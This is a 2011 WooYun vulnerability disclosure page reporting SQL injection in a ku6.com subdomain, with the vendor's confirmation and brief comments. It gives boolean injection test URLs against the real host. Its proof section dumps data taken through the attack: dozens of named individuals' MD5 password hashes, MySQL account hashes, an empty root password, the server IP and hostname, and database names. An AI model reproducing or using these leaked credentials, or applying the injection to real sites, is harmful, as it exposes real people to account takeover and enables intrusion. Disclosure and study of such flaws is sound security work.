当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02598

漏洞标题:酷6网SQL注入,权限很大

相关厂商:酷6网

漏洞作者: 路人甲

提交时间:2011-07-31 11:59

修复时间:2011-08-30 12:00

公开时间:2011-08-30 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-07-31: 细节已通知厂商并且等待厂商处理中
2011-08-01: 厂商已经确认,细节仅向厂商公开
2011-08-11: 细节向核心白帽子及相关领域专家公开
2011-08-21: 细节向普通白帽子公开
2011-08-31: 细节向实习白帽子公开
2011-08-30: 细节向公众公开

简要描述:

From:淫河舰队 Q群:16449200

详细说明:

http://haier-wulianwang.ku6.com/show.php?id=152 and 1=2
http://haier-wulianwang.ku6.com/show.php?id=152 and 1=3

漏洞证明:

马妍:909ffb0d90603f683db007b65e9a833a:
佳年:96e79218965eb72c92a549dd5a330112:
霍惠良:764afcdd6c5482ffd30953adf992b18e:
宋威:5801a985b8aa5bb214871bf9b6a82623:
王宝亮:96e79218965eb72c92a549dd5a330112:
王朋:34a34ef8b132254dae01ff1d4fe2a73c:
何伟:a3912e9c8161247a51521df07e041e15:
宁美修:0e65972dce68dad4d52d063967f0a705:
王勇:96e79218965eb72c92a549dd5a330112:
陈茂:96e79218965eb72c92a549dd5a330112:
张廷君:96e79218965eb72c92a549dd5a330112:
张晓宁:ac13ad0ac486d216c925872d2a4e1a90:
周游:5f29776a68c48e0d6a21fa4e7483dc3e:
张显伟:d78bbc1f191a9597f38086460729dd5c:
李帅:8f71a9c906d9496d95d989cae94d1c64:
李永梅:96e79218965eb72c92a549dd5a330112:
刘彤:96e79218965eb72c92a549dd5a330112:
刘颖:c6a4a221d60ab426ed68c05a4f5f2811:
江山:a93358c2a6978374f88d854228cea901:
杨露:a0dad820007b98b4ceef4a05ed63a5a0:
沈兴:e10adc3949ba59abbe56e057f20f883e:
吴瑕:e10adc3949ba59abbe56e057f20f883e:
杨博:e10adc3949ba59abbe56e057f20f883e:
凌毅:e10adc3949ba59abbe56e057f20f883e:
胡春玥:e10adc3949ba59abbe56e057f20f883e:
丛静宇:e10adc3949ba59abbe56e057f20f883e:
刘琳:e10adc3949ba59abbe56e057f20f883e:
夏鹏:e10adc3949ba59abbe56e057f20f883e:
潘欣茹:6421edf107880f708cea140b55a89e80:
许若仪:96e79218965eb72c92a549dd5a330112:
赵星辰:e10adc3949ba59abbe56e057f20f883e:
李颖:e10adc3949ba59abbe56e057f20f883e:
黄韦艳:d934bd3203f45379e557af23d871a648:
李楠:e10adc3949ba59abbe56e057f20f883e:
苏昊:5ad368298a06fcd1687927c0bd61e9a3:
卢美珍:96e79218965eb72c92a549dd5a330112:
李菲:bc670cf7ac4878c3d39d32c69311021c:
hefang:e10adc3949ba59abbe56e057f20f883e:
于征:96e79218965eb72c92a549dd5a330112:
陈高菊:e10adc3949ba59abbe56e057f20f883e:
李善义:e10adc3949ba59abbe56e057f20f883e:
张小宇:15b65b0e8f9d08554c71d8a03f003e6d:
高爽:d5492257ec833175a428d5f7a100d912:
徐文华:e10adc3949ba59abbe56e057f20f883e:
张旭洲:9fcb9c540a592d71f7295ea5e85a8b72:
刘苏葵:e10adc3949ba59abbe56e057f20f883e:
陈太锋:29bf55221e095c163c7c763ce13c90e0:
葛峰:e10adc3949ba59abbe56e057f20f883e:
李云海:339589fa93220ef498b1b7bc989ed98d:
靳取:0e4497f6bf1f1518fe00278d733d307c:
李志明:80b1b76c41b1036e4ac402b5770f3ee3:
余荣:82dd89f103e783f5039816d0c2d82207:
郝长宇:5016281862f595e78ffa42f085ea0f49:
洪喆:96e79218965eb72c92a549dd5a330112:


Host IP:		59.151.119.72
Web Server: nginx/0.7.64
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current User: special_ku6_com@59.151.119.72
Sql Version: 5.1.39-log
Current DB: special_ku6_com
System User: special_ku6_com@59.151.119.72
Host Name: BJ-SYQ-36
Installation dir: /usr/local/mysql/
DB User & Pass: root::localhost
special_ku6_com:*B96806CD96C99F9C85B7A7D3B1B77362B70F7CDF:%
root::127.0.0.1
sp1ync:*407E448973704D5717FF02D92E2148D26B23A432:%
snow_beer:*031D79F761179AE1EDADE76AE0F03A313BB3B6E9:%
ku6sync:*35E58038950750143F7C9079FF5378BAFADF9A47:%
ZhengWei:*3270F816EE59C0603D28304EABA87DC71489AD76:%
developer:*2725141256A74CEB607E6609CE72CD8D9B17E072:%
shijiebei:*1E07F7AC1F88C217CE42802BD3E28A5ADB749C69:%
checkservice:*19D97AB9DCE4C3C064EC13625D1F87175C3FE793:%
jlfhome:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:%
xyts:*09DE5A21D058B3E4F42BD10E50266F74DA5C653E:%
Data Bases: information_schema
a
beer
boshi
checkservice
comment_zhu
hisense
jlfhome
ku6_special
microsoft
mysql
shijiebei
special_admin_ku6_com
special_ku6_com
special_score
test
test1
yiliysr200904
yiliysr200910


%:special_ku6_com:*B96806CD96C99F9C85B7A7D3B1B77362B70F7CDF:
localhost:root::
127.0.0.1:root::
%:sp1ync:*407E448973704D5717FF02D92E2148D26B23A432:
%:snow_beer:*031D79F761179AE1EDADE76AE0F03A313BB3B6E9:
%:ku6sync:*35E58038950750143F7C9079FF5378BAFADF9A47:
%:ZhengWei:*3270F816EE59C0603D28304EABA87DC71489AD76:
%:developer:*2725141256A74CEB607E6609CE72CD8D9B17E072:
%:shijiebei:*1E07F7AC1F88C217CE42802BD3E28A5ADB749C69:
%:checkservice:*19D97AB9DCE4C3C064EC13625D1F87175C3FE793:
%:jlfhome:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:
%:xyts:*09DE5A21D058B3E4F42BD10E50266F74DA5C653E:

修复方案:

过滤。 有问题联系本人 435420828@qq.com

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2011-08-01 16:14

厂商回复:

多谢淫河舰队提交信息。

最新状态:

暂无


漏洞评价:

评论

  1. 2011-07-31 17:19 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    好强大的宣传

  2. 2011-08-02 07:06 | rootsecurity ( 实习白帽子 | Rank:77 漏洞数:20 | 关注开源,关注网络安全!INSERT INTO `w...)

    helen的组织,不解释